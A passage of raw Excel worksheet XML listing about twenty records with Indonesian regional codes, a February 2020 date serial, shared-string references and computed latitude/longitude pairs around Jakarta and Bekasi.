      </c>
      <c r="F1678" t="s">
        <v>5757</v>
      </c>
      <c r="G1678" t="s">
        <v>5758</v>
      </c>
      <c r="H1678" t="s">
        <v>26</v>
      </c>
      <c r="I1678" t="s">
        <v>929</v>
      </c>
      <c r="J1678" t="s">
        <v>1585</v>
      </c>
      <c r="L1678" t="s">
        <v>5759</v>
      </c>
      <c r="M1678">
        <v>3173060006</v>
      </c>
      <c r="N1678">
        <v>3173060</v>
      </c>
      <c r="O1678">
        <v>3173</v>
      </c>
      <c r="P1678">
        <v>31</v>
      </c>
      <c r="Q1678" t="s">
        <v>1587</v>
      </c>
      <c r="R1678" t="s">
        <v>61</v>
      </c>
      <c r="S1678" t="s">
        <v>62</v>
      </c>
      <c r="T1678" t="s">
        <v>33</v>
      </c>
      <c r="U1678" s="5">
        <v>10685215</v>
      </c>
      <c r="V1678" s="5" t="s">
        <v>15970</v>
      </c>
      <c r="W1678" s="5">
        <v>-615553</v>
      </c>
      <c r="X1678" t="s">
        <v>19736</v>
      </c>
      <c r="Y1678" t="str">
        <f t="shared" si="26"/>
        <v>-6.15553,106.85215</v>
      </c>
    </row>
    <row r="1679" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1679">
        <v>109204</v>
      </c>
      <c r="B1679" s="1">
        <v>43886</v>
      </c>
      <c r="C1679">
        <v>0</v>
      </c>
      <c r="D1679" t="s">
        <v>22</v>
      </c>
      <c r="E1679" t="s">
        <v>23</v>
      </c>
      <c r="F1679" t="s">
        <v>5760</v>
      </c>
      <c r="H1679" t="s">
        <v>26</v>
      </c>
      <c r="I1679" t="s">
        <v>271</v>
      </c>
      <c r="J1679" t="s">
        <v>5761</v>
      </c>
      <c r="L1679" t="s">
        <v>5762</v>
      </c>
      <c r="M1679">
        <v>3174020007</v>
      </c>
      <c r="N1679">
        <v>3174020</v>
      </c>
      <c r="O1679">
        <v>3174</v>
      </c>
      <c r="P1679">
        <v>31</v>
      </c>
      <c r="Q1679" t="s">
        <v>95</v>
      </c>
      <c r="R1679" t="s">
        <v>31</v>
      </c>
      <c r="S1679" t="s">
        <v>32</v>
      </c>
      <c r="T1679" t="s">
        <v>33</v>
      </c>
      <c r="U1679" s="5">
        <v>10675065</v>
      </c>
      <c r="V1679" s="5" t="s">
        <v>15971</v>
      </c>
      <c r="W1679" s="5">
        <v>-617301</v>
      </c>
      <c r="X1679" t="s">
        <v>19737</v>
      </c>
      <c r="Y1679" t="str">
        <f t="shared" si="26"/>
        <v>-6.17301,106.75065</v>
      </c>
    </row>
    <row r="1680" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1680">
        <v>109205</v>
      </c>
      <c r="B1680" s="1">
        <v>43886</v>
      </c>
      <c r="C1680">
        <v>0</v>
      </c>
      <c r="D1680" t="s">
        <v>22</v>
      </c>
      <c r="E1680" t="s">
        <v>23</v>
      </c>
      <c r="F1680" t="s">
        <v>5763</v>
      </c>
      <c r="G1680" t="s">
        <v>5764</v>
      </c>
      <c r="H1680" t="s">
        <v>26</v>
      </c>
      <c r="I1680" t="s">
        <v>27</v>
      </c>
      <c r="J1680" t="s">
        <v>2627</v>
      </c>
      <c r="L1680" t="s">
        <v>5765</v>
      </c>
      <c r="M1680">
        <v>3275060003</v>
      </c>
      <c r="N1680">
        <v>3275060</v>
      </c>
      <c r="O1680">
        <v>3275</v>
      </c>
      <c r="P1680">
        <v>32</v>
      </c>
      <c r="Q1680" t="s">
        <v>146</v>
      </c>
      <c r="R1680" t="s">
        <v>114</v>
      </c>
      <c r="S1680" t="s">
        <v>41</v>
      </c>
      <c r="T1680" t="s">
        <v>42</v>
      </c>
      <c r="U1680" s="5">
        <v>10697145</v>
      </c>
      <c r="V1680" s="5" t="s">
        <v>15972</v>
      </c>
      <c r="W1680" s="5">
        <v>-622643</v>
      </c>
      <c r="X1680" t="s">
        <v>19738</v>
      </c>
      <c r="Y1680" t="str">
        <f t="shared" si="26"/>
        <v>-6.22643,106.97145</v>
      </c>
    </row>
    <row r="1681" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1681">
        <v>109206</v>
      </c>
      <c r="B1681" s="1">
        <v>43886</v>
      </c>
      <c r="C1681">
        <v>0</v>
      </c>
      <c r="D1681" t="s">
        <v>22</v>
      </c>
      <c r="E1681" t="s">
        <v>23</v>
      </c>
      <c r="F1681" t="s">
        <v>5766</v>
      </c>
      <c r="G1681" t="s">
        <v>5767</v>
      </c>
      <c r="H1681" t="s">
        <v>26</v>
      </c>
      <c r="I1681" t="s">
        <v>27</v>
      </c>
      <c r="J1681" t="s">
        <v>5768</v>
      </c>
      <c r="L1681" t="s">
        <v>5769</v>
      </c>
      <c r="M1681">
        <v>3172050003</v>
      </c>
      <c r="N1681">
        <v>3172050</v>
      </c>
      <c r="O1681">
        <v>3172</v>
      </c>
      <c r="P1681">
        <v>31</v>
      </c>
      <c r="Q1681" t="s">
        <v>2896</v>
      </c>
      <c r="R1681" t="s">
        <v>358</v>
      </c>
      <c r="S1681" t="s">
        <v>49</v>
      </c>
      <c r="T1681" t="s">
        <v>33</v>
      </c>
      <c r="U1681" s="5">
        <v>10686763</v>
      </c>
      <c r="V1681" s="5" t="s">
        <v>15973</v>
      </c>
      <c r="W1681" s="5">
        <v>-629096</v>
      </c>
      <c r="X1681" t="s">
        <v>19739</v>
      </c>
      <c r="Y1681" t="str">
        <f t="shared" si="26"/>
        <v>-6.29096,106.86763</v>
      </c>
    </row>
    <row r="1682" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1682">
        <v>109207</v>
      </c>
      <c r="B1682" s="1">
        <v>43886</v>
      </c>
      <c r="C1682">
        <v>0</v>
      </c>
      <c r="D1682" t="s">
        <v>22</v>
      </c>
      <c r="E1682" t="s">
        <v>23</v>
      </c>
      <c r="F1682" t="s">
        <v>5770</v>
      </c>
      <c r="G1682" t="s">
        <v>5771</v>
      </c>
      <c r="H1682" t="s">
        <v>26</v>
      </c>
      <c r="I1682" t="s">
        <v>2073</v>
      </c>
      <c r="J1682" t="s">
        <v>498</v>
      </c>
      <c r="L1682" t="s">
        <v>5772</v>
      </c>
      <c r="M1682">
        <v>3171080001</v>
      </c>
      <c r="N1682">
        <v>3171080</v>
      </c>
      <c r="O1682">
        <v>3171</v>
      </c>
      <c r="P1682">
        <v>31</v>
      </c>
      <c r="Q1682" t="s">
        <v>2265</v>
      </c>
      <c r="R1682" t="s">
        <v>1403</v>
      </c>
      <c r="S1682" t="s">
        <v>108</v>
      </c>
      <c r="T1682" t="s">
        <v>33</v>
      </c>
      <c r="U1682" s="5">
        <v>10683310</v>
      </c>
      <c r="V1682" s="5" t="s">
        <v>15974</v>
      </c>
      <c r="W1682" s="5">
        <v>-626766</v>
      </c>
      <c r="X1682" t="s">
        <v>19740</v>
      </c>
      <c r="Y1682" t="str">
        <f t="shared" si="26"/>
        <v>-6.26766,106.83310</v>
      </c>
    </row>
    <row r="1683" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1683">
        <v>109208</v>
      </c>
      <c r="B1683" s="1">
        <v>43886</v>
      </c>
      <c r="C1683">
        <v>0</v>
      </c>
      <c r="D1683" t="s">
        <v>22</v>
      </c>
      <c r="E1683" t="s">
        <v>23</v>
      </c>
      <c r="F1683" t="s">
        <v>5773</v>
      </c>
      <c r="G1683" t="s">
        <v>5774</v>
      </c>
      <c r="H1683" t="s">
        <v>26</v>
      </c>
      <c r="I1683" t="s">
        <v>65</v>
      </c>
      <c r="J1683" t="s">
        <v>2627</v>
      </c>
      <c r="L1683" t="s">
        <v>5775</v>
      </c>
      <c r="M1683">
        <v>3275050003</v>
      </c>
      <c r="N1683">
        <v>3275050</v>
      </c>
      <c r="O1683">
        <v>3275</v>
      </c>
      <c r="P1683">
        <v>32</v>
      </c>
      <c r="Q1683" t="s">
        <v>2310</v>
      </c>
      <c r="R1683" t="s">
        <v>955</v>
      </c>
      <c r="S1683" t="s">
        <v>41</v>
      </c>
      <c r="T1683" t="s">
        <v>42</v>
      </c>
      <c r="U1683" s="5">
        <v>10697774</v>
      </c>
      <c r="V1683" s="5" t="s">
        <v>15975</v>
      </c>
      <c r="W1683" s="5">
        <v>-626029</v>
      </c>
      <c r="X1683" t="s">
        <v>19741</v>
      </c>
      <c r="Y1683" t="str">
        <f t="shared" si="26"/>
        <v>-6.26029,106.97774</v>
      </c>
    </row>
    <row r="1684" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1684">
        <v>109209</v>
      </c>
      <c r="B1684" s="1">
        <v>43886</v>
      </c>
      <c r="C1684">
        <v>0</v>
      </c>
      <c r="D1684" t="s">
        <v>22</v>
      </c>
      <c r="E1684" t="s">
        <v>23</v>
      </c>
      <c r="F1684" t="s">
        <v>5776</v>
      </c>
      <c r="H1684" t="s">
        <v>26</v>
      </c>
      <c r="I1684" t="s">
        <v>517</v>
      </c>
      <c r="J1684" t="s">
        <v>5777</v>
      </c>
      <c r="L1684" t="s">
        <v>250</v>
      </c>
      <c r="M1684">
        <v>3171020007</v>
      </c>
      <c r="N1684">
        <v>3171020</v>
      </c>
      <c r="O1684">
        <v>3171</v>
      </c>
      <c r="P1684">
        <v>31</v>
      </c>
      <c r="Q1684" t="s">
        <v>5778</v>
      </c>
      <c r="R1684" t="s">
        <v>484</v>
      </c>
      <c r="S1684" t="s">
        <v>108</v>
      </c>
      <c r="T1684" t="s">
        <v>33</v>
      </c>
      <c r="U1684" s="5">
        <v>10684562</v>
      </c>
      <c r="V1684" s="5" t="s">
        <v>15976</v>
      </c>
      <c r="W1684" s="5">
        <v>-627821</v>
      </c>
      <c r="X1684" t="s">
        <v>19742</v>
      </c>
      <c r="Y1684" t="str">
        <f t="shared" si="26"/>
        <v>-6.27821,106.84562</v>
      </c>
    </row>
    <row r="1685" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1685">
        <v>109210</v>
      </c>
      <c r="B1685" s="1">
        <v>43886</v>
      </c>
      <c r="C1685">
        <v>0</v>
      </c>
      <c r="D1685" t="s">
        <v>22</v>
      </c>
      <c r="E1685" t="s">
        <v>23</v>
      </c>
      <c r="F1685" t="s">
        <v>5779</v>
      </c>
      <c r="G1685" t="s">
        <v>5780</v>
      </c>
      <c r="H1685" t="s">
        <v>26</v>
      </c>
      <c r="I1685" t="s">
        <v>80</v>
      </c>
      <c r="J1685" t="s">
        <v>3810</v>
      </c>
      <c r="L1685" t="s">
        <v>5781</v>
      </c>
      <c r="M1685">
        <v>3175050003</v>
      </c>
      <c r="N1685">
        <v>3175050</v>
      </c>
      <c r="O1685">
        <v>3175</v>
      </c>
      <c r="P1685">
        <v>31</v>
      </c>
      <c r="Q1685" t="s">
        <v>1740</v>
      </c>
      <c r="R1685" t="s">
        <v>1013</v>
      </c>
      <c r="S1685" t="s">
        <v>547</v>
      </c>
      <c r="T1685" t="s">
        <v>33</v>
      </c>
      <c r="U1685" s="5">
        <v>10691589</v>
      </c>
      <c r="V1685" s="5" t="s">
        <v>15977</v>
      </c>
      <c r="W1685" s="5">
        <v>-617468</v>
      </c>
      <c r="X1685" t="s">
        <v>19743</v>
      </c>
      <c r="Y1685" t="str">
        <f t="shared" si="26"/>
        <v>-6.17468,106.91589</v>
      </c>
    </row>
    <row r="1686" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1686">
        <v>109211</v>
      </c>
      <c r="B1686" s="1">
        <v>43886</v>
      </c>
      <c r="C1686">
        <v>0</v>
      </c>
      <c r="D1686" t="s">
        <v>22</v>
      </c>
      <c r="E1686" t="s">
        <v>23</v>
      </c>
      <c r="F1686" t="s">
        <v>5782</v>
      </c>
      <c r="G1686" t="s">
        <v>5783</v>
      </c>
      <c r="H1686" t="s">
        <v>26</v>
      </c>
      <c r="I1686" t="s">
        <v>492</v>
      </c>
      <c r="J1686" t="s">
        <v>5784</v>
      </c>
      <c r="M1686">
        <v>3173070003</v>
      </c>
      <c r="N1686">
        <v>3173070</v>
      </c>
      <c r="O1686">
        <v>3173</v>
      </c>
      <c r="P1686">
        <v>31</v>
      </c>
      <c r="Q1686" t="s">
        <v>520</v>
      </c>
      <c r="R1686" t="s">
        <v>323</v>
      </c>
      <c r="S1686" t="s">
        <v>62</v>
      </c>
      <c r="T1686" t="s">
        <v>33</v>
      </c>
      <c r="U1686" s="5">
        <v>10683396</v>
      </c>
      <c r="V1686" s="5" t="s">
        <v>15978</v>
      </c>
      <c r="W1686" s="5">
        <v>-615025</v>
      </c>
      <c r="X1686" t="s">
        <v>19744</v>
      </c>
      <c r="Y1686" t="str">
        <f t="shared" si="26"/>
        <v>-6.15025,106.83396</v>
      </c>
    </row>
    <row r="1687" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1687">
        <v>109212</v>
      </c>
      <c r="B1687" s="1">
        <v>43886</v>
      </c>
      <c r="C1687">
        <v>0</v>
      </c>
      <c r="D1687" t="s">
        <v>22</v>
      </c>
      <c r="E1687" t="s">
        <v>23</v>
      </c>
      <c r="F1687" t="s">
        <v>5785</v>
      </c>
      <c r="G1687" t="s">
        <v>5786</v>
      </c>
      <c r="H1687" t="s">
        <v>26</v>
      </c>
      <c r="I1687" t="s">
        <v>2165</v>
      </c>
      <c r="J1687" t="s">
        <v>2603</v>
      </c>
      <c r="L1687" t="s">
        <v>5787</v>
      </c>
      <c r="M1687">
        <v>3174040002</v>
      </c>
      <c r="N1687">
        <v>3174040</v>
      </c>
      <c r="O1687">
        <v>3174</v>
      </c>
      <c r="P1687">
        <v>31</v>
      </c>
      <c r="Q1687" t="s">
        <v>2605</v>
      </c>
      <c r="R1687" t="s">
        <v>377</v>
      </c>
      <c r="S1687" t="s">
        <v>32</v>
      </c>
      <c r="T1687" t="s">
        <v>33</v>
      </c>
      <c r="U1687" s="5">
        <v>10678959</v>
      </c>
      <c r="V1687" s="5" t="s">
        <v>15979</v>
      </c>
      <c r="W1687" s="5">
        <v>-617363</v>
      </c>
      <c r="X1687" t="s">
        <v>19745</v>
      </c>
      <c r="Y1687" t="str">
        <f t="shared" si="26"/>
        <v>-6.17363,106.78959</v>
      </c>
    </row>
    <row r="1688" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1688">
        <v>109213</v>
      </c>
      <c r="B1688" s="1">
        <v>43886</v>
      </c>
      <c r="C1688">
        <v>0</v>
      </c>
      <c r="D1688" t="s">
        <v>22</v>
      </c>
      <c r="E1688" t="s">
        <v>23</v>
      </c>
      <c r="F1688" t="s">
        <v>5788</v>
      </c>
      <c r="G1688" t="s">
        <v>5789</v>
      </c>
      <c r="H1688" t="s">
        <v>26</v>
      </c>
      <c r="I1688" t="s">
        <v>1099</v>
      </c>
      <c r="J1688" t="s">
        <v>3035</v>
      </c>
      <c r="L1688" t="s">
        <v>5790</v>
      </c>
      <c r="M1688">
        <v>3171100007</v>
      </c>
      <c r="N1688">
        <v>3171100</v>
      </c>
      <c r="O1688">
        <v>3171</v>
      </c>
      <c r="P1688">
        <v>31</v>
      </c>
      <c r="Q1688" t="s">
        <v>1427</v>
      </c>
      <c r="R1688" t="s">
        <v>107</v>
      </c>
      <c r="S1688" t="s">
        <v>108</v>
      </c>
      <c r="T1688" t="s">
        <v>33</v>
      </c>
      <c r="U1688" s="5">
        <v>10683224</v>
      </c>
      <c r="V1688" s="5" t="s">
        <v>15980</v>
      </c>
      <c r="W1688" s="5">
        <v>-620706</v>
      </c>
      <c r="X1688" t="s">
        <v>19746</v>
      </c>
      <c r="Y1688" t="str">
        <f t="shared" si="26"/>
        <v>-6.20706,106.83224</v>
      </c>
    </row>
    <row r="1689" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1689">
        <v>109214</v>
      </c>
      <c r="B1689" s="1">
        <v>43886</v>
      </c>
      <c r="C1689">
        <v>0</v>
      </c>
      <c r="D1689" t="s">
        <v>22</v>
      </c>
      <c r="E1689" t="s">
        <v>23</v>
      </c>
      <c r="F1689" t="s">
        <v>5791</v>
      </c>
      <c r="G1689" t="s">
        <v>5792</v>
      </c>
      <c r="H1689" t="s">
        <v>26</v>
      </c>
      <c r="I1689" t="s">
        <v>166</v>
      </c>
      <c r="J1689" t="s">
        <v>648</v>
      </c>
      <c r="M1689">
        <v>3174020005</v>
      </c>
      <c r="N1689">
        <v>3174020</v>
      </c>
      <c r="O1689">
        <v>3174</v>
      </c>
      <c r="P1689">
        <v>31</v>
      </c>
      <c r="Q1689" t="s">
        <v>30</v>
      </c>
      <c r="R1689" t="s">
        <v>31</v>
      </c>
      <c r="S1689" t="s">
        <v>32</v>
      </c>
      <c r="T1689" t="s">
        <v>33</v>
      </c>
      <c r="U1689" s="5">
        <v>10677696</v>
      </c>
      <c r="V1689" s="5" t="s">
        <v>15981</v>
      </c>
      <c r="W1689" s="5">
        <v>-616774</v>
      </c>
      <c r="X1689" t="s">
        <v>18742</v>
      </c>
      <c r="Y1689" t="str">
        <f t="shared" si="26"/>
        <v>-6.16774,106.77696</v>
      </c>
    </row>
    <row r="1690" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1690">
        <v>109215</v>
      </c>
      <c r="B1690" s="1">
        <v>43886</v>
      </c>
      <c r="C1690">
        <v>0</v>
      </c>
      <c r="D1690" t="s">
        <v>22</v>
      </c>
      <c r="E1690" t="s">
        <v>23</v>
      </c>
      <c r="F1690" t="s">
        <v>5793</v>
      </c>
      <c r="G1690" t="s">
        <v>5794</v>
      </c>
      <c r="H1690" t="s">
        <v>26</v>
      </c>
      <c r="I1690" t="s">
        <v>5795</v>
      </c>
      <c r="J1690" t="s">
        <v>5796</v>
      </c>
      <c r="L1690" t="s">
        <v>5797</v>
      </c>
      <c r="M1690">
        <v>3172100001</v>
      </c>
      <c r="N1690">
        <v>3172100</v>
      </c>
      <c r="O1690">
        <v>3172</v>
      </c>
      <c r="P1690">
        <v>31</v>
      </c>
      <c r="Q1690" t="s">
        <v>3253</v>
      </c>
      <c r="R1690" t="s">
        <v>1436</v>
      </c>
      <c r="S1690" t="s">
        <v>49</v>
      </c>
      <c r="T1690" t="s">
        <v>33</v>
      </c>
      <c r="U1690" s="5">
        <v>10685821</v>
      </c>
      <c r="V1690" s="5" t="s">
        <v>14733</v>
      </c>
      <c r="W1690" s="5">
        <v>-621187</v>
      </c>
      <c r="X1690" t="s">
        <v>19747</v>
      </c>
      <c r="Y1690" t="str">
        <f t="shared" si="26"/>
        <v>-6.21187,106.85821</v>
      </c>
    </row>
    <row r="1691" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1691">
        <v>109216</v>
      </c>
      <c r="B1691" s="1">
        <v>43886</v>
      </c>
      <c r="C1691">
        <v>0</v>
      </c>
      <c r="D1691" t="s">
        <v>22</v>
      </c>
      <c r="E1691" t="s">
        <v>23</v>
      </c>
      <c r="F1691" t="s">
        <v>5798</v>
      </c>
      <c r="G1691" t="s">
        <v>5799</v>
      </c>
      <c r="H1691" t="s">
        <v>26</v>
      </c>
      <c r="I1691" t="s">
        <v>5034</v>
      </c>
      <c r="J1691" t="s">
        <v>5800</v>
      </c>
      <c r="M1691">
        <v>3173010002</v>
      </c>
      <c r="N1691">
        <v>3173010</v>
      </c>
      <c r="O1691">
        <v>3173</v>
      </c>
      <c r="P1691">
        <v>31</v>
      </c>
      <c r="Q1691" t="s">
        <v>4908</v>
      </c>
      <c r="R1691" t="s">
        <v>1481</v>
      </c>
      <c r="S1691" t="s">
        <v>62</v>
      </c>
      <c r="T1691" t="s">
        <v>33</v>
      </c>
      <c r="U1691" s="5">
        <v>10681321</v>
      </c>
      <c r="V1691" s="5" t="s">
        <v>15982</v>
      </c>
      <c r="W1691" s="5">
        <v>-621453</v>
      </c>
      <c r="X1691" t="s">
        <v>19748</v>
      </c>
      <c r="Y1691" t="str">
        <f t="shared" si="26"/>
        <v>-6.21453,106.81321</v>
      </c>
    </row>
    <row r="1692" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1692">
        <v>109217</v>
      </c>
      <c r="B1692" s="1">
        <v>43886</v>
      </c>
      <c r="C1692">
        <v>0</v>
      </c>
      <c r="D1692" t="s">
        <v>22</v>
      </c>
      <c r="E1692" t="s">
        <v>23</v>
      </c>
      <c r="F1692" t="s">
        <v>5801</v>
      </c>
      <c r="G1692" t="s">
        <v>5802</v>
      </c>
      <c r="H1692" t="s">
        <v>26</v>
      </c>
      <c r="I1692" t="s">
        <v>166</v>
      </c>
      <c r="J1692" t="s">
        <v>5803</v>
      </c>
      <c r="L1692" t="s">
        <v>5804</v>
      </c>
      <c r="M1692">
        <v>3173010005</v>
      </c>
      <c r="N1692">
        <v>3173010</v>
      </c>
      <c r="O1692">
        <v>3173</v>
      </c>
      <c r="P1692">
        <v>31</v>
      </c>
      <c r="Q1692" t="s">
        <v>5805</v>
      </c>
      <c r="R1692" t="s">
        <v>1481</v>
      </c>
      <c r="S1692" t="s">
        <v>62</v>
      </c>
      <c r="T1692" t="s">
        <v>33</v>
      </c>
      <c r="U1692" s="5">
        <v>10680572</v>
      </c>
      <c r="V1692" s="5" t="s">
        <v>15983</v>
      </c>
      <c r="W1692" s="5">
        <v>-619793</v>
      </c>
      <c r="X1692" t="s">
        <v>19749</v>
      </c>
      <c r="Y1692" t="str">
        <f t="shared" si="26"/>
        <v>-6.19793,106.80572</v>
      </c>
    </row>
    <row r="1693" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1693">
        <v>109218</v>
      </c>
      <c r="B1693" s="1">
        <v>43886</v>
      </c>
      <c r="C1693">
        <v>0</v>
      </c>
      <c r="D1693" t="s">
        <v>22</v>
      </c>
      <c r="E1693" t="s">
        <v>23</v>
      </c>
      <c r="F1693" t="s">
        <v>5806</v>
      </c>
      <c r="H1693" t="s">
        <v>26</v>
      </c>
      <c r="I1693" t="s">
        <v>166</v>
      </c>
      <c r="J1693" t="s">
        <v>2627</v>
      </c>
      <c r="L1693" t="s">
        <v>5807</v>
      </c>
      <c r="M1693">
        <v>3275010011</v>
      </c>
      <c r="N1693">
        <v>3275010</v>
      </c>
      <c r="O1693">
        <v>3275</v>
      </c>
      <c r="P1693">
        <v>32</v>
      </c>
      <c r="Q1693" t="s">
        <v>2389</v>
      </c>
      <c r="R1693" t="s">
        <v>287</v>
      </c>
      <c r="S1693" t="s">
        <v>41</v>
      </c>
      <c r="T1693" t="s">
        <v>42</v>
      </c>
      <c r="U1693" s="5">
        <v>10691035</v>
      </c>
      <c r="V1693" s="5" t="s">
        <v>15984</v>
      </c>
      <c r="W1693" s="5">
        <v>-625967</v>
      </c>
      <c r="X1693" t="s">
        <v>19750</v>
      </c>
      <c r="Y1693" t="str">
        <f t="shared" si="26"/>
        <v>-6.25967,106.91035</v>
      </c>
    </row>
    <row r="1694" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1694">
        <v>109219</v>
      </c>
      <c r="B1694" s="1">
        <v>43886</v>
      </c>
      <c r="C1694">
        <v>0</v>
      </c>
      <c r="D1694" t="s">
        <v>22</v>
      </c>
      <c r="E1694" t="s">
        <v>23</v>
      </c>
      <c r="F1694" t="s">
        <v>5808</v>
      </c>
      <c r="G1694" t="s">
        <v>5809</v>
      </c>
      <c r="H1694" t="s">
        <v>26</v>
      </c>
      <c r="I1694" t="s">
        <v>5810</v>
      </c>
      <c r="J1694" t="s">
        <v>5811</v>
      </c>
      <c r="L1694" t="s">
        <v>5812</v>
      </c>
      <c r="M1694">
        <v>3173010005</v>
      </c>
      <c r="N1694">
        <v>3173010</v>
      </c>
      <c r="O1694">
        <v>3173</v>
      </c>
      <c r="P1694">
        <v>31</v>
      </c>
      <c r="Q1694" t="s">
        <v>5805</v>
      </c>
      <c r="R1694" t="s">
        <v>1481</v>
      </c>
      <c r="S1694" t="s">
        <v>62</v>
      </c>
      <c r="T1694" t="s">
        <v>33</v>
      </c>
      <c r="U1694" s="5">
        <v>10680844</v>
      </c>
      <c r="V1694" s="5" t="s">
        <v>15985</v>
      </c>
      <c r="W1694" s="5">
        <v>-619306</v>
      </c>
      <c r="X1694" t="s">
        <v>19751</v>
      </c>
      <c r="Y1694" t="str">
        <f t="shared" si="26"/>
        <v>-6.19306,106.80844</v>
      </c>
    </row>
    <row r="1695" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1695">
        <v>109220</v>
      </c>
      <c r="B1695" s="1">
        <v>43886</v>
      </c>
      <c r="C1695">
        <v>0</v>
      </c>
      <c r="D1695" t="s">
        <v>22</v>
      </c>
      <c r="E1695" t="s">
        <v>23</v>
      </c>
      <c r="F1695" t="s">
        <v>5813</v>
      </c>
      <c r="G1695" t="s">
        <v>5814</v>
      </c>
      <c r="H1695" t="s">
        <v>26</v>
      </c>
      <c r="I1695" t="s">
        <v>271</v>
      </c>
      <c r="J1695" t="s">
        <v>4658</v>
      </c>
      <c r="L1695" t="s">
        <v>5815</v>
      </c>
      <c r="M1695">
        <v>3172030005</v>
      </c>
      <c r="N1695">
        <v>3172030</v>
      </c>
      <c r="O1695">
        <v>3172</v>
      </c>
      <c r="P1695">
        <v>31</v>
      </c>
      <c r="Q1695" t="s">
        <v>1256</v>
      </c>
      <c r="R1695" t="s">
        <v>228</v>
      </c>
      <c r="S1695" t="s">
        <v>49</v>
      </c>
      <c r="T1695" t="s">
        <v>33</v>
      </c>
      <c r="U1695" s="5">
        <v>10691490</v>
      </c>
      <c r="V1695" s="5" t="s">
        <v>15986</v>
      </c>
      <c r="W1695" s="5">
        <v>-631629</v>
      </c>
      <c r="X1695" t="s">
        <v>19752</v>
      </c>
      <c r="Y1695" t="str">
        <f t="shared" si="26"/>
        <v>-6.31629,106.91490</v>
      </c>
    </row>
    <row r="1696" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1696">
        <v>109221</v>
      </c>
      <c r="B1696" s="1">
        <v>43886</v>
      </c>
      <c r="C1696">
        <v>0</v>
      </c>
      <c r="D1696" t="s">
        <v>22</v>
      </c>
      <c r="E1696" t="s">
        <v>23</v>
      </c>
      <c r="F1696" t="s">
        <v>5816</v>
      </c>
      <c r="G1696" t="s">
        <v>5817</v>
      </c>
      <c r="H1696" t="s">
        <v>26</v>
      </c>
      <c r="I1696" t="s">
        <v>137</v>
      </c>
      <c r="J1696" t="s">
        <v>5818</v>
      </c>
      <c r="L1696" t="s">
        <v>5819</v>
      </c>
      <c r="M1696">
        <v>3173020005</v>
      </c>
      <c r="N1696">
        <v>3173020</v>
      </c>
      <c r="O1696">
        <v>3173</v>
      </c>
      <c r="P1696">
        <v>31</v>
      </c>
      <c r="Q1696" t="s">
        <v>2041</v>
      </c>
      <c r="R1696" t="s">
        <v>179</v>
      </c>
      <c r="S1696" t="s">
        <v>62</v>
      </c>
      <c r="T1696" t="s">
        <v>33</v>
      </c>
      <c r="U1696" s="5">
        <v>10682593</v>
      </c>
      <c r="V1696" s="5" t="s">
        <v>15987</v>
      </c>
      <c r="W1696" s="5">
        <v>-618414</v>
      </c>
      <c r="X1696" t="s">
        <v>19753</v>
      </c>
      <c r="Y1696" t="str">
        <f t="shared" si="26"/>
        <v>-6.18414,106.82593</v>
      </c>
    </row>
    <row r="1697" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1697">
        <v>109222</v>
      </c>
      <c r="B1697" s="1">
        <v>43886</v>
      </c>
      <c r="C1697">
        <v>0</v>
      </c>
      <c r="D1697" t="s">
        <v>22</v>
      </c>
      <c r="E1697" t="s">
        <v>23</v>
      </c>
      <c r="F1697" t="s">
        <v>5820</v>
      </c>
      <c r="G1697" t="s">
        <v>5821</v>
      </c>
      <c r="H1697" t="s">
        <v>26</v>
      </c>
      <c r="I1697" t="s">
        <v>3616</v>
      </c>
      <c r="J1697" t="s">
        <v>4658</v>
      </c>
      <c r="L1697" t="s">
        <v>5815</v>
      </c>
      <c r="M1697">
        <v>3172030005</v>
      </c>
      <c r="N1697">
        <v>3172030</v>
      </c>
      <c r="O1697">
        <v>3172</v>
      </c>
      <c r="P1697">
        <v>31</v>
      </c>
      <c r="Q1697" t="s">
        <v>1256</v>
      </c>
      <c r="R1697" t="s">
        <v>228</v>
      </c>
      <c r="S1697" t="s">
        <v>49</v>
      </c>
      <c r="T1697" t="s">
        <v>33</v>
      </c>
      <c r="U1697" s="5">
        <v>10691567</v>
      </c>
      <c r="V1697" s="5" t="s">
        <v>15988</v>
      </c>
      <c r="W1697" s="5">
        <v>-631905</v>
      </c>
      <c r="X1697" t="s">
        <v>19754</v>
      </c>
      <c r="Y1697" t="str">
        <f t="shared" si="26"/>
        <v>-6.31905,106.91567</v>
      </c>
    </row>
    <row r="1698" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1698">
        <v>109223</v>
      </c>
      <c r="B1698" s="1">
        <v>43886</v>
      </c>
      <c r="C1698">
        <v>0</v>
      </c>
      <c r="D1698" t="s">
        <v>22</v>
      </c>
      <c r="E1698" t="s">
        <v>23</v>
      </c>
      <c r="F1698" t="s">
        <v>5822</v>
      </c>
      <c r="H1698" t="s">
        <v>26</v>
      </c>
      <c r="I1698" t="s">
        <v>979</v>
      </c>
      <c r="J1698" t="s">
        <v>793</v>
      </c>
      <c r="L1698" t="s">
        <v>5823</v>
      </c>
      <c r="M1698">
        <v>3175010002</v>
      </c>
      <c r="N1698">
        <v>3175010</v>
      </c>
      <c r="O1698">
        <v>3175</v>
      </c>
      <c r="P1698">
        <v>31</v>
      </c>
      <c r="Q1698" t="s">
        <v>616</v>
      </c>
      <c r="R1698" t="s">
        <v>546</v>
      </c>
      <c r="S1698" t="s">
        <v>547</v>
      </c>
      <c r="T1698" t="s">
        <v>33</v>
      </c>
      <c r="U1698" s="5">
        <v>10677318</v>
      </c>
      <c r="V1698" s="5" t="s">
        <v>15989</v>
      </c>
      <c r="W1698" s="5">
        <v>-613956</v>
      </c>
      <c r="X1698" t="s">
        <v>19755</v>
      </c>
      <c r="Y1698" t="str">
